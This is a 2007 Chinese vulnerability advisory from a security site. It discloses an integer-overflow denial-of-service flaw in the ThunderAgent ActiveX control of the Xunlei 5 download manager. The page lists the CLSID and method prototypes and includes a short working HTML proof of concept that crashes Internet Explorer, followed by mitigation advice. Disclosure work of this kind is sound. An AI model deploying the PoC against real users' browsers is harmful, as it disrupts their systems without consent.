首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
迅雷5 ThunderAgent Module 远程拒绝服务漏洞(0day)
来源:http://www.wutengfei.com/ 作者:13k 发布时间:2007-01-18  

摘要:

迅雷是由Thunder Networking公司开发的一个下载软件,在中国有着非常广泛的用户。迅雷5的ThunderAgent_005.dll中注册了一个activex控件,当Internet Explorer调用他的某些方法时,将会造成整数溢出,成功利用将造成Internet Explorer崩溃。

影响版本:

迅雷5.5.2.252(已测试),
迅雷5.5.3.264(2006-12月最新版本已测试,受影响的dll变成ThunderAgent_007.dll)
其他版本可能也受影响

细节:

在ThunderAgent_005.dll中,有两处方法调用时忽略了输入参数异常的情况,当输入参数为精心构造的负数或大整数时,将造成整数溢出,产生不可预料的结果,从而造成浏览器崩溃。

该Activex注册控件的Object Classid是 {485463B7-8FB2-4B3B-B29B-8B919B0EACCE}
Method原型如下:

[id(0x00000006), helpstring("method GetInfoStruct")]
void GetInfoStruct([in] int pInfo);


[id(0x00000007), helpstring("method GetTaskInfoStruct")]
void GetTaskInfoStruct([in] int pTaskInfo);

程序代码
<html>
<head>

<script>
function AxisFun()
{

evil.GetTaskInfoStruct(0x7fffffff);

}
</script>
</head>

<OBJECT ID="evil" CLASSID="CLSID:{485463B7-8FB2-4B3B-B29B-8B919B0EACCE}"></OBJECT>


<script>java script:AxisFun();</script>

</html>


建议:

禁止ie执行activex


厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.xunlei.com


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Help Workshop 4.03.0
·BrowseDialog Class (ccrpbds6.d
·MS Internet Explorer VML Downl
·Mac OS X 10.4.8 SLP Daemon Ser
·Woltlab Burning Board <= 1.
·phpBP <= RC3 (2.204) (sql/c
·Woltlab Burning Board <= 1.
·GNU/Linux mbse-bbs <= 0.70.
·Woltlab Burning Board <= 1.
·phpIndexPage <= 1.0.1 (conf
·CCRP Folder Treeview Control (
·Apple iChat 3.1.6 v441 aim://
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved